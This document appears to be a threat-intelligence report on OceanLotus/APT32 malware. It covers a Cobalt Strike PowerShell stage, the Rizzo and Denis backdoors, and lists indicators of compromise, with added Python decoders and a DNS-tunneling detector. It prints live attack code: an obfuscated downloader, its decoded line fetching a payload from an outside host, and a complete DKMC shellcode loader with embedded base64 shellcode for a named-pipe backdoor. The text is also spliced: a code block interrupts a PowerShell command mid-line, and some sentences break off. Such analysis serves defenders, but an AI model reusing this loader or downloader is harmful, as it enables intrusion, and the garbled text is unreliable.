    HostApplication=POwersheLL -NOex -wInDOwSTYL HiDDen -nOLOgo -EXECUtIoNpOl BYPaSs -NOPr -nOninTERacti -Comman .((geT-vARiAble '*mDR*').namE[3-11-2]-JoiN'') ("$( SeT 'Ofs' '' )"+[STriNg]((82-94-67-59-51-51-117-126-108-54-116-121-113-126-120-111-59-117-126-111-53-108-126-121-120-119-114-126-117-111-50-53-127-116-108-117-119-116-122-127-104-111-105-114-117-124-51-60-115-111-111-107-33-52-52-122-127-104-111-105-114-107-104-111-105-122-109-126-119-53-120-116-118-52-110-104-126-105-53-114-120-116-60-50-50)|foReACH
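Both PowerShell 600 events above hide the real command the same way: the script text is stored as an array of integers, each XORed with a one-byte key (0x16 in the first event, 0x1b in the second), mapped back to characters with `[char]`, joined with an empty `$OFS`, and handed to `iex`, which is itself assembled from characters 3, 11 and 2 of the variable name `MaximumDriveCount` returned by `Get-Variable *MdR*`. The Python below is an added example, not code from the report or from any tool it describes. It decodes both arrays as transcribed from the events (line wraps and formatting removed) and shows how to pull the array and the key straight out of a HostApplication string; the sample HostApplication it builds is a reconstruction in the first event's layout, not a verbatim copy, and it accepts either `-` or `,` between the integers. As printed, the key-0x16 array yields the `img.png` URL and the key-0x1b array yields `user.ico`.

```python
import re

# Integer arrays transcribed from the two PowerShell 600 events in the report
# (line wraps and formatting removed), each paired with its -bxor key.
EVENT_1 = (0x16, [95, 83, 78, 54, 62, 62, 120, 115, 97, 59, 121, 116, 124, 115, 117, 98, 54,
                  120, 115, 98, 56, 97, 115, 116, 117, 122, 127, 115, 120, 98, 63, 56, 114,
                  121, 97, 120, 122, 121, 119, 114, 101, 98, 100, 127, 120, 113, 62, 49, 126,
                  98, 98, 102, 44, 57, 57, 119, 114, 101, 98, 100, 127, 102, 101, 98, 100,
                  119, 96, 115, 122, 56, 117, 121, 123, 57, 100, 115, 101, 121, 99, 100, 117,
                  115, 101, 57, 127, 123, 119, 113, 115, 101, 57, 127, 123, 113, 56, 102,
                  120, 113, 49, 63, 63])
EVENT_2 = (0x1b, [82, 94, 67, 59, 51, 51, 117, 126, 108, 54, 116, 121, 113, 126, 120, 111, 59,
                  117, 126, 111, 53, 108, 126, 121, 120, 119, 114, 126, 117, 111, 50, 53, 127,
                  116, 108, 117, 119, 116, 122, 127, 104, 111, 105, 114, 117, 124, 51, 60, 115,
                  111, 111, 107, 33, 52, 52, 122, 127, 104, 111, 105, 114, 107, 104, 111, 105,
                  122, 109, 126, 119, 53, 120, 116, 118, 52, 110, 104, 126, 105, 53, 114, 120,
                  116, 60, 50, 50])

# Array of integers in parentheses, separated by '-' (as printed) or ','.
_ARRAY_RE = re.compile(r"\(\s*(\d+(?:\s*[-,]\s*\d+)+)\s*\)")
_KEY_RE = re.compile(r"-bxor\s*(0x[0-9a-f]+|\d+)", re.IGNORECASE)
_URL_RE = re.compile(r"https?://[^\s'\"()]+")


def decode_xor_array(values, key):
    """Reverse `[char]($_ -bxor key)` joined with an empty $OFS."""
    return "".join(chr(v ^ key) for v in values)


def decode_event(event):
    key, values = event
    return decode_xor_array(values, key)


def decode_host_application(host_application):
    """Locate the integer list and the -bxor key in an obfuscated HostApplication
    string and return the decoded command, or None if the pattern is absent."""
    m_arr = _ARRAY_RE.search(host_application)
    m_key = _KEY_RE.search(host_application)
    if not (m_arr and m_key):
        return None
    values = [int(x) for x in re.findall(r"\d+", m_arr.group(1))]
    key = int(m_key.group(1), 0)  # handles both '0x16' and '22'
    return decode_xor_array(values, key)


def extract_urls(command):
    """URLs a decoded downloader command would fetch (hunting pivot)."""
    return _URL_RE.findall(command)


def build_sample_event(key, values):
    """Constructed HostApplication value in the first event's layout (a
    reconstruction, not a verbatim copy of the logged string)."""
    array = "-".join(str(v) for v in values)
    return (
        "POwErshElL -nONiNtera -noL -noprOFI -EXE bYpasS -nOEXIT -w HIddEN -coMma "
        "\"$(Set-ItEM 'variAble:OFS' '')\"+[striNg]((" + array + ")"
        "|FoReACh{[ChaR]($_-bxoR 0x" + format(key, "02x") + ")})"
        "+\"$( Sv 'OFs' ' ')\"|.((gET-VaRiabLe '*MdR*').NaMe[3-11-2]-joIN'')"
    )


if __name__ == "__main__":
    for name, event in (("event 1 (0x16)", EVENT_1), ("event 2 (0x1b)", EVENT_2)):
        cmd = decode_event(event)
        print(name, "->", cmd, extract_urls(cmd))
    print(decode_host_application(build_sample_event(*EVENT_1)))
```

The same three regular expressions work against the raw `HostApplication=` field of a 4104/400/600 event export, so the decoder can be dropped into a log-processing pipeline; anything it returns `None` for was not obfuscated in this particular style and needs a different decoder.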
    {[char]($_ -bxoR 0x1b)})+"$(set 'OfS' ' ')")
    EngineVersion=
    RunspaceId=
    PipelineId=
    CommandName=
    CommandType=
    ScriptName=
    CommandPath=
    CommandLine=
    EventData/Binary -> empty

_Figure 57: PowerShell event_

The decoded PowerShell evaluates to:

    IEX((new-object net.webclient).downloadstring('http://adstripstravel.com/resources/images/img.png'))

_Figure 58: Simple PowerShell downloader_

**Behavior**

The downloaded payload was ultimately executed as a service to maintain persistence:

    System/Service Control Manager ID [7045] :EventData/Data ->
    ServiceName = b8d0bfd
    ImagePath = %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -encodedcommand __

_Figure 59: System event showing PowerShell one-liner service_

The Base64 encoded command from the event decodes to the following script (reproduced from the event, with comments added):

```powershell
Set-StrictMode -Version 2

# The loader body is kept in a here-string so it can be re-launched inside a
# 32-bit job on 64-bit hosts (see the If block at the bottom).
$DoIt = @'
# Resolve an export of an already-loaded module through the non-public
# Microsoft.Win32.UnsafeNativeMethods class (GetModuleHandle + GetProcAddress),
# which avoids an Add-Type/P-Invoke compilation step.
function func_get_proc_address {
    Param ($var_module, $var_procedure)
    $var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
    return $var_unsafe_native_methods.GetMethod('GetProcAddress').Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))
}

# Emit a delegate type into an in-memory dynamic assembly so that a raw
# function pointer can be invoked with the given parameter and return types.
function func_get_delegate_type {
    Param (
        [Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,
        [Parameter(Position = 1)] [Type] $var_return_type = [Void]
    )
    $var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
    $var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')
    $var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')
    return $var_type_builder.CreateType()
}

# Base64-encoded x86 shellcode: the named-pipe backdoor shown in Figure 61.
[Byte[]]$var_code = [System.Convert]::FromBase64String("/OiJAAAAYInlMdJki1Iwi1IMi1IUi3IoD7dKJjH/McCsPGF8Aiwgwc8NAcfi8FJXi1IQi0I8AdCLQHiFwHRKAdBQi0gYi1ggAdPjPEmLNIsB1jH/McCswc8NAcc44HX0A334O30kdeJYi1gkAdNmiwxLi1gcAdOLBIsB0IlEJCRbW2FZWlH/4FhfWosS64ZdMcBqQGgAEAAAaP//BwBqAGhYpFPl/9VQ6agAAABaMclRUWgAsAQAaACwBABqAWoGagNSaEVw39T/1VCLFCRqAFJoKG994v/VhcB0bmoAagBqAInmg8YEieKDwgiLfCQMagBWagRSV2itnl+7/9WLVCQQagBWaAAgAABSV2itnl+7/9WFwHQUi0wkBIsEJAHIiQQki1QkEAHC69eLfCQMV2jA+t38/9VXaMaWh1L/1YsEJItMJAg5wXQHaPC1olb/1f9kJBDoU////1xcLlxwaXBlXHN0YXR1c180NTk4AA==")

# VirtualAlloc(NULL, len, MEM_COMMIT|MEM_RESERVE = 0x3000, PAGE_EXECUTE_READWRITE = 0x40)
$var_buffer = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $var_buffer, $var_code.length)

# CreateThread on the RWX buffer, then block on it with WaitForSingleObject(INFINITE)
$var_hthread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll CreateThread), (func_get_delegate_type @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero, 0, $var_buffer, [IntPtr]::Zero, 4, [IntPtr]::Zero)
[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll WaitForSingleObject), (func_get_delegate_type @([IntPtr], [Int32]))).Invoke($var_hthread, 0xffffffff) | Out-Null
'@

# The shellcode is 32-bit: on a 64-bit PowerShell host, run it in a 32-bit job.
If ([IntPtr]::size -eq 8) {
    start-job { param($a) IEX $a } -RunAs32 -Argument $DoIt | wait-job | Receive-Job
}
else {
    IEX $DoIt
}
```

_Figure 60: DKMC PowerShell shellcode loader_

This is the shellcode runner shipped with DKMC: [https://github.com/Exploit-install/DKMC/blob/master/core/util/exec-sc.ps1](https://github.com/Exploit-install/DKMC/blob/master/core/util/exec-sc.ps1)

The injected shellcode payload (stored in `$var_code`) creates a named pipe called `\\.\pipe\status_4598`:

_Figure 61: Shellcode payload_

Any data read from the named pipe is executed directly as shellcode, allowing the threat actor to deploy additional payloads.

### Rizzo

|Classification|Malware/Backdoor|
|---|---|
|Aliases|PHOREAL (FireEye)|
|Size|304KB|
|Type|Win32 PE (DLL)|
|File Name|mobsync.exe|
|Observed|2018|

**Overview**

Rizzo is a very simple backdoor capable of creating a reverse shell, performing simple file I/O and enumerating top-level windows. It communicates with a list of four preconfigured C2 servers over ICMP. (The original text adds "on port 53"; ICMP carries no port numbers, so that qualifier should be disregarded.)

**Behavior**

Upon execution of the exported "DllEntry" function, Rizzo initializes Winsock 2.2 and then creates a run-once mutex:

    Local\{5FBC3F53-A76D-4248-969A-31740CBC8AD6}

_Figure 62: Rizzo run-once mutex_

The malware then tries to resolve the hardcoded C2 domain names. The list of domains is stored in an RC4-encrypted RT_RCDATA/2 resource; the resource begins with the RC4 key, followed by the encrypted C2 addresses.

_Figure 63: RCDATA resource containing RC4 key (in red) followed by encrypted C2 URLs_

_Figure 64: Decrypted C2 addresses_

_Figure 65: Rizzo C2 domains_

The backdoor also sets two values, "T" and "U", under the `HKCU\SOFTWARE\Microsoft\SkyDrive\{87F4F1B2-824E-420F-8B48-4E8B575C2A7B}` registry key.
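Figure 63 shows the layout a configuration extractor has to handle: the RT_RCDATA/2 resource starts with the RC4 key and the encrypted C2 list follows it. The Python below is an added example, not code from the report or from Rizzo itself. It implements RC4 and recovers the addresses from a blob of that shape. The key length and the NUL-separated ASCII layout of the decrypted list are assumptions (the report does not state them), so the extractor tries several plausible key lengths and keeps the one whose output is clean hostname-like text; the resource it runs on is constructed in the script from placeholder domains, not Rizzo's real configuration.

```python
import string


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA). RC4 is symmetric: the same call encrypts and decrypts."""
    S = list(range(256))
    j = 0
    for i in range(256):                      # key-scheduling algorithm
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:                         # pseudo-random generation algorithm
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


# Characters allowed in a decrypted C2 entry (host names, IPs, optional scheme/port).
_HOSTCHARS = set(string.ascii_letters + string.digits + ".-:/")


def _looks_like_c2_list(plaintext: bytes):
    """Accept a decryption only if it is a NUL-separated list of hostname-like
    ASCII strings (assumed layout); return the list or None."""
    parts = [p for p in plaintext.split(b"\x00") if p]
    if not parts:
        return None
    hosts = []
    for p in parts:
        try:
            s = p.decode("ascii")
        except UnicodeDecodeError:
            return None
        if any(c not in _HOSTCHARS for c in s) or "." not in s:
            return None
        hosts.append(s)
    return hosts


def extract_c2(resource: bytes, key_lengths=(4, 8, 16, 32)):
    """Key-prefix layout: key = resource[:n], ciphertext = resource[n:].
    The key length is unknown, so each candidate is tried in turn and the
    first one that decrypts to a plausible host list wins."""
    for n in key_lengths:
        if len(resource) <= n:
            continue
        hosts = _looks_like_c2_list(rc4(resource[:n], resource[n:]))
        if hosts:
            return n, hosts
    return None


# Constructed sample resource (not Rizzo's real data): a 16-byte key followed by
# an RC4-encrypted, NUL-separated list of placeholder C2 hosts.
SAMPLE_KEY = bytes.fromhex("0f1e2d3c4b5a69788796a5b4c3d2e1f0")
SAMPLE_HOSTS = ["c2-one.example.net", "c2-two.example.org", "10.0.0.5", "c2-four.example.com"]
SAMPLE_RESOURCE = SAMPLE_KEY + rc4(SAMPLE_KEY, b"\x00".join(h.encode() for h in SAMPLE_HOSTS) + b"\x00")

if __name__ == "__main__":
    print(extract_c2(SAMPLE_RESOURCE))
```

Against a real sample the `resource` bytes would come from the PE resource directory (for instance via `pefile`), and the plausibility filter is what stops a wrong key length from being reported as a result: an incorrect RC4 key produces bytes that fail the ASCII-and-dot check almost immediately.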
The registry path is stored as a stack-based, RC4-encrypted string:

_Figure 66: String decryption_

**_Protocol_**

To pass through firewalls that permit ICMP and to stay under the radar, the backdoor uses ICMP to communicate with its C2 server.

_Figure 67: Creating an ICMP handle_

_Figure 68: Backdoor communication through ICMP_

The C2 command packets have the following format:

|Offset|Size|Description|
|---|---|---|
|0x0000|4 bytes|Magic, or session ID|
|0x0004|4 bytes|Command code|
|0x0008|variable|Command parameters|

The backdoor response header consists of the following information:

**Command Code** **Parameters** **Description**

### Denis

|Classification|Malware/Backdoor|
|---|---|
|Aliases|SOUNDBITE (FireEye)|
|Size|< 300KB|
|Type|Win32 PE (EXE)|
|File Name|CiscoEapFast.exe, WerFault.exe, SwUSB.exe, msprivs.exe, SndVolSSO.exe|
|Observed|2016|

**Overview**

Denis is a simple backdoor developed by the OceanLotus Group, widely observed in the wild and known for using DNS tunneling as the transport for its C2 communications. Denis is typically deployed early in the attack lifecycle, and it appears to be less tailored to the target than the more advanced backdoors that are used once a foothold has been established within an environment.
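Denis' use of DNS as a C2 transport leaves a recognisable footprint in resolver logs: many distinct, long subdomains under one registrable domain, queried with record types (NULL, TXT, CNAME) that ordinary clients rarely issue. The Python below is an added example, not part of the report or of any vendor tool. It aggregates per-domain statistics over a handful of constructed resolver log lines and flags domains whose traffic looks like tunneling. The log format, the "registrable domain = last two labels" shortcut and the thresholds are assumptions to tune for a real environment; the tunnel-carrying domain names in the sample lines are taken from the report's appendix, but the log lines themselves are constructed.

```python
import hashlib
import math
import re
from collections import defaultdict

# Record types the report lists as carriers for Denis' encoded data.
TUNNEL_QTYPES = {"NULL", "TXT", "CNAME"}

# Log line format is an assumption: "<ts> client=<ip> qtype=<type> qname=<name>"
LINE_RE = re.compile(r"qtype=(?P<qtype>\w+)\s+qname=(?P<qname>\S+)")


def _fake_label(seed: str, length: int) -> str:
    """Deterministic stand-in for an encoded data chunk (constructed, not real traffic)."""
    return hashlib.sha256(seed.encode()).hexdigest()[:length]


# Constructed resolver log: tunnel-style NULL/TXT queries plus ordinary lookups.
SAMPLE_LOG = "\n".join(
    [f"2017-11-02T08:0{i}:00 client=10.1.2.3 qtype=NULL qname={_fake_label(f'chunk{i}', 48)}.z.teriava.com"
     for i in range(8)]
    + [f"2017-11-02T08:1{i}:00 client=10.1.2.3 qtype=TXT qname={_fake_label(f'tx{i}', 40)}.z.notificeva.com"
       for i in range(4)]
    + [
        "2017-11-02T08:20:00 client=10.1.2.4 qtype=A qname=www.example.com",
        "2017-11-02T08:20:05 client=10.1.2.4 qtype=A qname=mail.example.com",
        "2017-11-02T08:20:09 client=10.1.2.4 qtype=TXT qname=example.com",
        "2017-11-02T08:21:00 client=10.1.2.5 qtype=AAAA qname=cdn.example.com",
    ]
)


def shannon_entropy(s: str) -> float:
    """Bits per character; encoded data sits well above natural host names."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def registrable_domain(qname: str) -> str:
    """Last two labels. A real deployment should use the Public Suffix List."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:])


def domain_stats(log_text: str):
    """Per registrable domain: query count, distinct names, mean length and
    entropy of the leading label, and the share of tunnel-type queries."""
    agg = defaultdict(lambda: {"queries": 0, "names": set(), "label_len": 0.0,
                               "entropy": 0.0, "tunnel": 0})
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        qname, qtype = m["qname"].lower(), m["qtype"].upper()
        d = agg[registrable_domain(qname)]
        first = qname.split(".")[0]
        d["queries"] += 1
        d["names"].add(qname)
        d["label_len"] += len(first)
        d["entropy"] += shannon_entropy(first)
        d["tunnel"] += qtype in TUNNEL_QTYPES
    return {
        dom: {
            "queries": d["queries"],
            "unique_names": len(d["names"]),
            "mean_label_len": d["label_len"] / d["queries"],
            "mean_entropy": d["entropy"] / d["queries"],
            "tunnel_share": d["tunnel"] / d["queries"],
        }
        for dom, d in agg.items()
    }


def flag_tunneling(stats, min_names=3, min_label_len=20, min_tunnel_share=0.5):
    """Thresholds are assumptions; baseline them against known-good traffic."""
    return sorted(
        dom for dom, s in stats.items()
        if s["unique_names"] >= min_names
        and s["mean_label_len"] >= min_label_len
        and s["tunnel_share"] >= min_tunnel_share
    )


if __name__ == "__main__":
    stats = domain_stats(SAMPLE_LOG)
    for dom in flag_tunneling(stats):
        print(dom, stats[dom])
```

A single TXT lookup against `example.com` (an SPF check, say) does not trip the rule, because the label length and name-diversity conditions have to hold at the same time; conversely, a tunnel that uses only A records would evade this particular rule, so `mean_entropy` is reported alongside the other fields for a second, type-independent heuristic.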
**Behavior**

Upon execution, Denis imports the bulk of its runtime APIs dynamically, with the DLL and function names encoded as stack-based strings:

_Figure 69: Denis import DLL and function names encoded on the stack_

These UNICODE strings are decoded with a byte-level add or subtract, depending on the variant:

_Figure 70: ADD 0x80 string decoding_

This technique is used heavily amongst APT32 backdoors (for example Remy, Figure 71):

_Figure 71: Remy stack-based string decoding_

used for C2 tunneling in much the same way as API/function names:

_Figure 72: Denis C2 domain name decoding_

After decoding and reading the configuration stored in the registry, Denis creates a thread to communicate with the C2 server, typically supporting the following commands:

typically routed via a DNS forwarder:

_Figure 73: Denis DNS tunneling_

Denis samples have been observed using a variety of forwarders and name servers for C2, as well as embedding encoded data in NULL, TXT or CNAME records, depending on configuration.

### Network Intelligence

Network intelligence was initially obtained during November 2017.

**167.114.44.146**

All C2 domains were registered using Privacy Guardian on August 21, 2017. All host names resolve to the same Canadian IP address (167.114.44.146).

**89.249.65.134**

**185.244.213.28**

### Conclusions

OceanLotus employs both home-brew and off-the-shelf RATs. They use PowerShell scripts from open-source offensive tooling, including MSFvenom, Veil and DKMC, to load shellcode and DLL payloads into memory.
C2 functionality is customized to the target, and all domains are registered through an anonymization service called PrivacyGuardian.

The Roland and Remy trojans share similarities and some code re-use with other known OceanLotus malware. The overall design and development of these threats indicate they come from a well-funded development team. The OceanLotus Group uses an expansive amount of custom library code that can easily be repurposed for maximum effectiveness against their next target.

+1-844-CYLANCE [sales@cylance.com](mailto:sales%40cylance.com?subject=) [www.cylance.com](http://www.cylance.com)

### Appendix

# OceanLotus Table

Columns: **MD5** **SHA256** **Source** **File Names** **Type** **Name** **Aliases** **Size** **Timestamp** **First Seen ITW** **Parent** **Relationships** **Hosted On** **C2** **IOCS** **Notes**

29a807b64777ea215b1953e091e8ea1c d2619dd966f942d9870e7728d4fb238f83b5769d84f0850e3df35ab167da3a41 Cy underwears.png PS1 + DLL Remy Windshield 364353 11/8/17 0:32
f9f843dc7c3486ea1ca979980a9fd318 72ab5a4086ab51b09bf0de3cff666fd0b50eb33581c06094d02f8283162fcf18 Cy gnsdk_submit.dll, certcredprovider.dll.mui DLL Roland 272872 5/28/09 13:54 Apr-17 partially obfuscated
e1973fcd28806ef60f47d01f8b7cc23e a5497ec98195e7731b3de4f2e8c28083f86f46818ddc42425713be5410b9540d Cy plugin.lst DLL CamCapture 120320 10/24/07 4:23 Nov-17 rss.honoremarson.com, repo.paigeherzog.com, ssl.wolfgangneudorf.com, help.angelinagerste.com, mms.garyschulze.com
121918fd5630cb670d182c8483738bf1 d4008091d1b25214d7575881364d95f3ecdc0222f1e84c4c537ce87e5c4cd122 Cy OsErXrdO, wpfgfx_v0300.dll PS1 + EXE Splinter Komprogo (?)
2133014 7/13/10 11:49 Nov-17 http[:]//adstripstravel[.]com/resources/images/img.png a2859b211809978bd128a1025e403963 bacdb6a6bdd0b81c551ef30514dc3186f483b135fbc63759dd861d2de59585ad Cy img.png PS1 CobaltStrike 289385 Nov-17 http[:]//adstripstravel[.]com/user.ico 6575db1c50c5bdd0313622e16c08f79a 70a749a760e99471b6825818f9091f4ee08de538b4686fa0475f0df667e91643 Cy user.ico PS1 CobaltStrike 286001 Nov-17 http[:]//110.10.179[.]65:80/download/microsoft.jpg 40f644f1957d0a30ba76470279e1463a afaafe2944970913772d013853ecc297c66230fa25c78956ac53a6c933059276 9 microsoft.jpg PS1 CobaltStrike 287984 5/23/17 21:04 http[:]//support.chatconnecting[.]com:80/icon.ico 417a0ecf6459edf56ea704a9b5783208 aea41f0fe65b8d414fb0130089ffd84662e94062bbded7fcdfb144a8dc9156b3 9 icon.ico PS1 CobaltStrike 264862 12/7/17 20:28 d1e614479fee318904442c16c5ef4877 29bdd6341d59caa70a9e9f6229f7d4c2603d2ba333bc4573cf8c0faabe0f16af 5 hgfs.dll DLL 5407928 9/1/14 11:43 5/23/17 0:43 ef68cfad4cdae58624d12ff97ae00e68aafae9e6f33f3bd23dffc37869a1e578 1f8ade068ba6fbfe8605e0946bf2d79f c2f5ee2b99b2160178e947099d54cea940c21911997246938d274e9c6a834bc8 5 ep7res01.dll DLL 94720 10/20/10 20:09 5/23/17 0:43 ef68cfad4cdae58624d12ff97ae00e68aafae9e6f33f3bd23dffc37869a1e578 Creates/queries the following values under [HKLM|HKCU]\Software\ Microsoft\GameCenter\Identity: "ID", "Cert", "Counter" c117ea93410ad849e7a3ff9293bcd9ab 9453ab44d0e10a59b322614b9a76ab87deb4c93bfce6466d5afa945ea8ebb7d6 5 hp6000.dll DLL 94720 5/10/07 20:40 6/11/17 6:42 poses as QQ, loads backdoor module (Bundle.rdb) 0529b1d393f405bc2b2b33709dd57153 e6594d11244357537fa3ef5292cb52ccbd7c8f26a277f7003ade80964351878f 1 rtx.exe EXE Salgorea (Symc), 25904128 5/10/08 3:30 3/25/15 0:42 poses as QQ, loads backdoor module (Bundle.rdb) Encryptor (360) 41bced8c65c5822d43cadad7d1dc49fd d3cf53d74868625d4ee00e367162798f829acf532bad69cf1b7ce959de0e072a 1 NetcaEKeyClient.exe EXE Salgorea (Symc), 8608256 4/24/10 18:51 2/2/15 20:44 png.eirahrlichmann.com, engine.lanaurmi. 
Encryptor (360) com, movies.onaldest.com (87.98.153.188), images.andychroeder.com (87.98.153.188) bc1ccc120d185a0c36b191ec6b74397c c4d4169dc85ad57168b1efabdd32cb67a76c27ce1fb615685505b378ee345a3f 5 GoogleUpdateSetup.exe EXE 2508288 1/24/08 7:47 8/2/17 21:49 png.eirahrlichmann.com, engine.lanaurmi. com, movies.onaldest.com (89.34.237.142), images.andychroeder.com (89.34.237.142) 42123d2493598c9ac9803fe1b92ed032 969d97e3fe95de96971a65de02d2bf7fb7d81cbbda24dd47c3c1ffcf81bbcee3 5 GoogleUpdateSetup.exe EXE 2511360 2/12/06 8:11 6/1/17 4:50 http[:]//template.ethanypin[.]com/KoreanTimesSSK.ttf png.eirahrlichmann.com, engine.lanaurmi. com, movies.onaldest.com (89.34.237.142), images.andychroeder.com (89.34.237.142) 3b53e66f34beb3cd30e6a7da457e86c8 34cf914444493995379731c887637c07fd6308e412a15518b60a2642820f09d4 5 KoreanTimesSSK.ttf, KB3033929.exe EXE 1451520 2/13/11 16:41 6/11/17 6:42 png.eirahrlichmann.com, engine.lanaurmi. com, movies.onaldest.com (87.98.153.188), images.andychroeder.com (87.98.153.188) 3bd041ef488806c55fbc40b4af24eabb 66f7850c039cd85acdcb9a68674ec7422f9ab6edc89d95fb877562ca26d71d52 5 7zS.sfx.exe EXE 1709568 2/12/06 8:11 7/9/17 17:13 png.eirahrlichmann.com engine.lanaurmi. 
com, movies.onaldest.com (89.34.237.142), images.andychroeder.com (89.34.237.142) 46745e29f15eedfabba7e080f6295200 3caaa69c5ce00e17efc61a83ad71823dcfcca6a7c9dc013be3d58b1c894d407a 5 So tay van de phap ly cho cac nha hoat EXE 8260608 10/19/11 23:29 6/11/17 11:31 54df4c7e55ceb16e875b07b621b66f577f42198b85872261cd9a5be885ede7d2 http[:]//template.ethanypin[.]com/Cursif.ttf smtp.galamower.com (193.169.245.31), dong nhan quyen_20170427.final.exe help.galaspot.net (193.169.245.31), system.galaburner.info (1.1.1.1) e02e37ea705f1066798f285836a6fc46 ef68cfad4cdae58624d12ff97ae00e68aafae9e6f33f3bd23dffc37869a1e578 4 Cursif.ttf EXE 1517568 12/11/08 17:32 5/23/17 0:42 29bdd6341d59caa70a9e9f6229f7d4c2603d2ba333bc4573cf8c0faabe0f16af, smtp.galamower.com (193.169.245.31), c2f5ee2b99b2160178e947099d54cea940c21911997246938d274e9c6a834bc8 help.galaspot.net (193.169.245.31), system.galaburner.info (1.1.1.1) 7edcae7740ee7e7c75699cfbb4d89310 e7c855161c6240beb0dec7b8209df8289be22eb9665cf71cf76228472c9de8b5 4 Excel.exe EXE 1693696 12/21/10 21:49 7/23/17 4:45 https[:]//xc2dfa-sn3301.files.1drv[.]com/y4mzaSVTDpsdcSchibE9Jtc_ czEWKouetlGePP89op0rwCx471q4Eaj8LKql7iprSszeUCMeFSyiKTAiyNM4ONPPW6q_13rgYs6iJwE85LGfIKneCt7SVosmeM8K_ OZlnUn0NOiWGUa0S9vflX8YUBG4E6oE4Gss9vV3VhvxIAk-3eWztb5fY0v6CsXEbybiB8U DcTIj9dyK5ZwB1brAzUtQ/Install.RobotoSlab-Font.exe?download&psid=1 smtp.galamower.com (193.169.245.31), help.galaspot.net (193.169.245.31), system.galaburner.info (1.1.1.1) e71f3dc106852cd4648c41376204af9f 023a4f500af9aac9960066a96fb0d811e4e25df7d9d564b3d0cc899b7c2bb5b3 4 Install.RobotoSlab-Font.exe EXE 2044928 12/27/11 16:09 6/23/17 10:08 http[:]//download-attachments.s3.amazonaws[.]com/d00377793cdfea033296436c67cf2b3cf8989048/ http://185.141.27.116/xyz2, c9c5fb3a-936b-456e-9878-2e95becde07e http://185.141.27.116/safebrowsing/rd/ CltOb12nLW1IbHehcmUtd2hUdmFzEBAY70KIOkUDC7h2 9eed9619eac172fa0b29de755907759c 16fdb8f388f5a8737130d952f752fc9201ffde8549ae583c7582ab01147d171d 4 WinWorld.exe, Bai viet hot 
can dang bao final.exe, EXE CobaltStrike 184832 6/14/17 7:38 6/24/17 5:19 http://185.141.27.116/xyz2, Phu huynh khong tin tuong truong dai hoc hutech.exe http://185.141.27.116/safebrowsing/rd/ CltOb12nLW1IbHehcmUtd2hUdmFzEBAY70KIOkUDC7h2 c4dbc10104f058fcc5500d61cd48746a 82369d8e376beb0c26d93e16f9794139163ce14e394d113a84a40f96bcde0cbb 4 flash_installer.exe EXE CobaltStrike 181760 6/14/17 7:38 6/19/17 9:03 http://193.169.244.213/WQLp, http://193.169.244.213/safebrowsing/rd/ CltOb12nLW1IbHehcmUtd2hUdmFzEBAY70KIOkUDC7h2 c781b4cde28609ff2d7b217671e1f110 45243bd5eb94718bcc0b36d941989d9e2d8c9329c059c3e537513e7fa21e0f5a 4 fids.exe EXE Cloudrunner 70144 3/7/16 22:54 8/13/16 17:15 jeffreyue.com (46.183.222.84), Nasahlaes. (360) com, Jeffreyue.com, Rackerasr.com fcd7227891271a65b729a27de962c0cb b6b872de14275866bed7d9a7f685a382a29fa298394d21cdd365de452db5a3c8 6 FontExt.dll, adobe-font-pack.exe EXE Denis 1732096 11/16/11 9:54 10/15/17 6:47 urnage.com (173.209.43.20), Drops Salgorea DLL (loader) and alyerrac.com, ucaargo.com SyLog.bin (encrypted backdoor) 58d2907361f6414742dcc5071ca20980 5dff6bc9e8898f2ed09ced9ac23b7e4d867e90c3efbe42726edcb01ecb0b1673 6 flashplayer26pp_ka-install.exe, rastlsc.exe EXE Denis 2639872 9/17/08 19:34 7/28/17 10:11 16a608f88ef13ebdb2287482aa29629e7b34664cf133ab7d653c15808e92f8fa http[:]//dload01.s3.amazonaws[.]com/b89fdbf4-9f80-11e7-abc4-2209cec278b6b50a/FirefoxInstaller.exe maerferd.com (46.183.223.107), Drops Salgorea DLL (loader) and Harinarach.com, Eoneorbin.com SyLog.bin (encrypted backdoor) eb2b52ed27346962c4b7b26df51ebafa bdb83301a470d202480274df161638f83f8f26e7dda131a11b89a5a3d8259c73 6, 7, 10 